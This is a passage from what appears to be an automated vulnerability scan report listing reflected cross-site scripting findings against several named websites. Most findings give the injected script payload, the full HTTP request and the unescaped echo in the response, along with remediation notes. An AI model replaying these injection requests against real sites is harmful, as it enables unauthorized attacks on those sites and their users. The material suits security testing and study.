The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b1ec"-alert(1)-"52123b4735c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /$|http:9b1ec"-alert(1)-"52123b4735c/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=3244900364.2614838093.3830776576; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Sun, 30 Jan 2011 01:52:20 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 31115 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-lm30 --> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... <!-- s_265.mmxgo=true; s_265.pageName="Page Not Found"; s_265.channel="us.bv"; s_265.trackExternalLinks="true"; s_265.prop1="$|http:9b1ec"-alert(1)-"52123b4735c"; s_265.pfxID="bkv"; s_265.disablepihost=false; s_265.prop12="http://www.blackvoices.com/$|http:9b1ec\"-alert(1)-\"52123b4735c/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertain ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3897</script><script>alert(1)</script>770d674eae7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /$|http:/latino.aol.coma3897</script><script>alert(1)</script>770d674eae7/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=3244834828.1155220301.3818652416; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Sun, 30 Jan 2011 01:52:21 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 31109 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-lm29 --> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... Not Found"; s_265.channel="us.bv"; s_265.trackExternalLinks="true"; s_265.prop1="$|http:"; s_265.pfxID="bkv"; s_265.disablepihost=false; s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.coma3897</script><script>alert(1)</script>770d674eae7/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video"; s_265.linkInternal ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4b86</script><script>alert(1)</script>2267ebd2b1e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /$|http:/latino.aol.com/$|.ivillage.com.*e4b86</script><script>alert(1)</script>2267ebd2b1e/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=3240247308.903299917.585433600; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Sun, 30 Jan 2011 01:52:23 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 31107 Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b318</script><script>alert(1)</script>cd70b89820e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com8b318</script><script>alert(1)</script>cd70b89820e/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=2393099708.970474317.387515136; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Sun, 30 Jan 2011 01:52:24 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 31109 Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9d46</script><script>alert(1)</script>07c8793dc9d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-videof9d46</script><script>alert(1)</script>07c8793dc9d HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=2334838204.1239171917.4086825728; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Sun, 30 Jan 2011 01:52:25 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 31107 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ld30 --> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... |http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-videof9d46</script><script>alert(1)</script>07c8793dc9d"; s_265.linkInternalFilters="javascript:,aol.com,blackvoices.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
5.302. http://www.bloglines.com/sub/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bloglines.com
Path:
/sub/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 571b2--><script>alert(1)</script>7d4838203da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /sub/?571b2--><script>alert(1)</script>7d4838203da=1 HTTP/1.1 Host: www.bloglines.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html Content-Length: 6773 Connection: close Date: Sun, 30 Jan 2011 01:52:27 GMT Server: lighttpd/1.4.26
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Bl ...[SNIP]... <input type="hidden" name="url" value="?571b2--><script>alert(1)</script>7d4838203da=1" /> ...[SNIP]...
5.303. http://www.bloglines.com/sub/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bloglines.com
Path:
/sub/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6488"><script>alert(1)</script>ca0eedc370c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sub/?a6488"><script>alert(1)</script>ca0eedc370c=1 HTTP/1.1 Host: www.bloglines.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html Content-Length: 6770 Connection: close Date: Sun, 30 Jan 2011 01:52:26 GMT Server: lighttpd/1.4.26
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Bl ...[SNIP]... <form method="post" action="http://dashboard.bloglines.com/subscribe.php?url=?a6488"><script>alert(1)</script>ca0eedc370c=1"> ...[SNIP]...
5.304. http://www.bloglines.com/sub/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bloglines.com
Path:
/sub/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fc6fa<script>alert(1)</script>715c72a1043 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sub/?fc6fa<script>alert(1)</script>715c72a1043=1 HTTP/1.1 Host: www.bloglines.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html Content-Length: 6764 Connection: close Date: Sun, 30 Jan 2011 01:52:27 GMT Server: lighttpd/1.4.26
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Bl ...[SNIP]... <p>Click here to subscribe to ?fc6fa<script>alert(1)</script>715c72a1043=1</p> ...[SNIP]...
5.305. http://www.co2stats.com/propres.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.co2stats.com
Path:
/propres.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb89e'%3balert(1)//42e64c5198f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb89e';alert(1)//42e64c5198f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /propres.php?s=/bb89e'%3balert(1)//42e64c5198f1138 HTTP/1.1 Host: www.co2stats.com Proxy-Connection: keep-alive Referer: http://news.ycombinator.com/news Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 15:05:00 GMT Server: Apache/2.2.17 Content-Length: 3370 Content-Type: text/html
The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b06c6'%3balert(1)//9c21dfc1ee was submitted in the s parameter. This input was echoed as b06c6';alert(1)//9c21dfc1ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /propres.php?s=1138b06c6'%3balert(1)//9c21dfc1ee HTTP/1.1 Host: www.co2stats.com Proxy-Connection: keep-alive Referer: http://news.ycombinator.com/news Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 15:04:48 GMT Server: Apache/2.2.17 Content-Length: 3102 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 492d1'><script>alert(1)</script>6033be6539a was submitted in the REST URL parameter 4. This input was echoed as 492d1\'><script>alert(1)</script>6033be6539a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application492d1'><script>alert(1)</script>6033be6539a/ HTTP/1.1 Host: www.davidpoll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 29 Jan 2011 23:24:51 GMT Server: Apache X-Powered-By: PHP/5.2.16 X-Pingback: http://www.davidpoll.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=3a5cef17df808cf07e6579d534901881; path=/ Last-Modified: Sat, 29 Jan 2011 23:24:51 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29422
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
5.308. http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload be141'><script>alert(1)</script>17b62cd0d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as be141\'><script>alert(1)</script>17b62cd0d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/?be141'><script>alert(1)</script>17b62cd0d2=1 HTTP/1.1 Host: www.davidpoll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5ad37'><script>alert(1)</script>899882eab2b was submitted in the REST URL parameter 1. This input was echoed as 5ad37\'><script>alert(1)</script>899882eab2b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content5ad37'><script>alert(1)</script>899882eab2b/plugins/tweetable/main_css.css HTTP/1.1 Host: www.davidpoll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 01:22:34 GMT Server: Apache X-Powered-By: PHP/5.2.16 X-Pingback: http://www.davidpoll.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Sun, 30 Jan 2011 01:22:34 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29039
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1622'><script>alert(1)</script>60670df59c9 was submitted in the REST URL parameter 2. This input was echoed as b1622\'><script>alert(1)</script>60670df59c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/pluginsb1622'><script>alert(1)</script>60670df59c9/tweetable/main_css.css HTTP/1.1 Host: www.davidpoll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 01:22:58 GMT Server: Apache X-Powered-By: PHP/5.2.16 X-Pingback: http://www.davidpoll.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Sun, 30 Jan 2011 01:22:59 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29039
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d9b3f'><script>alert(1)</script>fcedbfe1dcc was submitted in the REST URL parameter 3. This input was echoed as d9b3f\'><script>alert(1)</script>fcedbfe1dcc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/tweetabled9b3f'><script>alert(1)</script>fcedbfe1dcc/main_css.css HTTP/1.1 Host: www.davidpoll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 01:23:20 GMT Server: Apache X-Powered-By: PHP/5.2.16 X-Pingback: http://www.davidpoll.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Sun, 30 Jan 2011 01:23:20 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29039
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a769'><script>alert(1)</script>42dc73b4f0d was submitted in the REST URL parameter 4. This input was echoed as 7a769\'><script>alert(1)</script>42dc73b4f0d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/tweetable/main_css.css7a769'><script>alert(1)</script>42dc73b4f0d HTTP/1.1 Host: www.davidpoll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 01:23:42 GMT Server: Apache X-Powered-By: PHP/5.2.16 X-Pingback: http://www.davidpoll.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Sun, 30 Jan 2011 01:23:42 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29039
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 96d3c'><script>alert(1)</script>a88048e9c66 was submitted in the REST URL parameter 1. This input was echoed as 96d3c\'><script>alert(1)</script>a88048e9c66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content96d3c'><script>alert(1)</script>a88048e9c66/themes/fusion/js/fusion.js HTTP/1.1 Host: www.davidpoll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 01:22:47 GMT Server: Apache X-Powered-By: PHP/5.2.16 X-Pingback: http://www.davidpoll.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Sun, 30 Jan 2011 01:22:49 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28991
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f4af6'><script>alert(1)</script>94b0369aa was submitted in the REST URL parameter 2. This input was echoed as f4af6\'><script>alert(1)</script>94b0369aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themesf4af6'><script>alert(1)</script>94b0369aa/fusion/js/fusion.js HTTP/1.1 Host: www.davidpoll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 01:23:14 GMT Server: Apache X-Powered-By: PHP/5.2.16 X-Pingback: http://www.davidpoll.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Sun, 30 Jan 2011 01:23:14 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4de2c'><script>alert(1)</script>9f9243aaacf was submitted in the REST URL parameter 3. This input was echoed as 4de2c\'><script>alert(1)</script>9f9243aaacf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/fusion4de2c'><script>alert(1)</script>9f9243aaacf/js/fusion.js HTTP/1.1 Host: www.davidpoll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 01:23:30 GMT Server: Apache X-Powered-By: PHP/5.2.16 X-Pingback: http://www.davidpoll.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Sun, 30 Jan 2011 01:23:30 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28991
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a3d83'><script>alert(1)</script>9a983a4fff9 was submitted in the REST URL parameter 4. This input was echoed as a3d83\'><script>alert(1)</script>9a983a4fff9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/fusion/jsa3d83'><script>alert(1)</script>9a983a4fff9/fusion.js HTTP/1.1 Host: www.davidpoll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 01:23:47 GMT Server: Apache X-Powered-By: PHP/5.2.16 X-Pingback: http://www.davidpoll.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Sun, 30 Jan 2011 01:23:47 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28991
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7bac8'><script>alert(1)</script>5932159de94 was submitted in the REST URL parameter 5. This input was echoed as 7bac8\'><script>alert(1)</script>5932159de94 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/fusion/js/fusion.js7bac8'><script>alert(1)</script>5932159de94 HTTP/1.1 Host: www.davidpoll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;
Response
